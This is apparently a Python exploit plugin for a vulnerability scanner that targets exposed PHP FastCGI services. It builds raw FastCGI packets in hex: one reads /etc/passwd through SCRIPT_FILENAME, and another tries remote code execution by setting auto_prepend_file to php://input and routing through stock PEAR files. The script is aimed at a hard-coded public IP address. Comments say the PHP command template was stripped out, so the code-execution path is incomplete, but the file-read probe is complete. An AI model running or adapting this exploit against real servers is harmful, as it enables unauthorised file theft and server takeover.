17 | 54 5f 4d 45 54 48 4f 44 50 4f 53 54 09 5b 50 48 18 | 50 5f 56 41 4c 55 45 61 6c 6c 6f 77 5f 75 72 6c 19 | 5f 69 6e 63 6c 75 64 65 20 3d 20 4f 6e 0a 64 69 20 | 73 61 62 6c 65 5f 66 75 6e 63 74 69 6f 6e 73 20 21 | 3d 20 0a 73 61 66 65 5f 6d 6f 64 65 20 3d 20 4f 22 | 66 66 0a 61 75 74 6f 5f 70 72 65 70 65 6e 64 5f 23 | 66 69 6c 65 20 3d 20 70 68 70 3a 2f 2f 69 6e 70 24 | 75 74 0f 17 53 43 52 49 50 54 5f 46 49 4c 45 4e 25 | 41 4d 45 26 | """) + '{path}' \ 27 | + bin2str(""" 28 | 0d 01 44 4f 43 55 29 | 4d 45 4e 54 5f 52 4f 4f 54 2f 0f 10 53 45 52 56 30 | 45 52 5f 53 4f 46 54 57 41 52 45 67 6f 20 2f 20 31 | 66 63 67 69 63 6c 69 65 6e 74 20 0b 09 52 45 4d 32 | 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30 2e 33 | 31 0f 08 53 45 52 56 45 52 5f 50 52 4f 54 4f 43 34 | 4f 4c 48 54 54 50 2f 31 2e 31 0e 02 43 4f 4e 54 35 | 45 4e 54 5f 4c 45 4e 47 54 48 36 | """) + '{data_length}' \ 37 | + bin2str(""" 38 | 00 00 00 00 39 | 01 04 00 01 00 00 00 00 01 05 00 01 00 47 01 00 40 | """) + '{php_code}' \ 41 | + bin2str(""" 42 | 00 43 | """) 44 | 45 | poc_payload = bin2str(''' 46 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 47 | 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 48 | 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 49 | 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 50 | 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 51 | 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 52 | 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 53 | 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 54 | 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 55 | 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 56 | 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 57 | ''') 58 | 59 | phpfile_list = [ 60 | # '/usr/share/php/Archive/Tar.php', 61 | # '/usr/share/php/Console/Getopt.php', 62 | '/usr/share/php/OS/Guess.php', 63 | '/usr/share/php/PEAR.php', 64 | # '/usr/share/php/PEAR/Autoloader.php', 65 | # '/usr/share/php/PEAR/Builder.php', 66 | # '/usr/share/php/PEAR/Command.php', 67 | # 
def send_socket(host, port, timeout, waittime=1, payload=''):
    """Fire *payload* at host:port, wait *waittime* seconds, and return up to
    1 KiB of response bytes.  The socket is always closed (the original leaked
    it on every call and on every exception)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socket.setdefaulttimeout(timeout)
    try:
        sock.connect((host, port))
        sock.send(payload.encode('utf-8'))
        time.sleep(waittime)
        return sock.recv(1024)
    finally:
        sock.close()


def fast_cgi_rce(host, port, php_filepath='', commond=''):
    """Attempt FastCGI code execution through *php_filepath*.

    Returns (True, raw_response) when the marker string comes back,
    otherwise (False, b'') — a consistent tuple, unlike the original's
    bare ``False``.
    """
    php_code = ""
    if commond:
        # NOTE(review): the PHP payload template was evidently stripped from
        # this file — '"" % commond' raised TypeError for any non-empty
        # commond.  TODO: restore the original template (it must echo the
        # 0b8c4ba3... marker).  Until then, pass the command through as-is.
        php_code = commond

    exp_payload = exp_payload_base.format(
        path=php_filepath, data_length=str(len(php_code)),
        php_code=php_code
    )

    res = send_socket(host, port, timeout=5, waittime=1, payload=exp_payload)
    if b'0b8c4ba32f584b513cb08b17d638a688' in res:
        return True, res
    return False, b''


def exploit(host, port):
    """Try each known PHP file path; (True, detail) on the first RCE hit."""
    for filepath in phpfile_list:
        hit, _ = fast_cgi_rce(host, port, php_filepath=filepath)
        if hit:
            return True, '存在任意代码执行漏洞,php文件路径:' + filepath
    return False, ''


def verify(host, port):
    """Check the arbitrary-file-read primitive (reads /etc/passwd)."""
    res = send_socket(host, port, timeout=5, waittime=0, payload=poc_payload)
    if b':root:' in res:
        return True, '存在fastcgi任意文件读取漏洞'
    return False, ''


def do(host):
    """Entry point for the scan runner.

    Returns the (found, info) tuple every other script in scripts/ uses —
    the original returned a bare string on the success path, which broke
    callers that unpack (bool, str).
    """
    info = ''
    port = 80
    try:
        found, detail = verify(host, port)
        if found:
            info += detail
        found, detail = exploit(host, port)
        if found:
            info = info + u';' if info else info
            info += detail
        return bool(info), info
    except Exception as e:
        print(e)
    return False, ''


if __name__ == '__main__':
    do('117.51.152.151')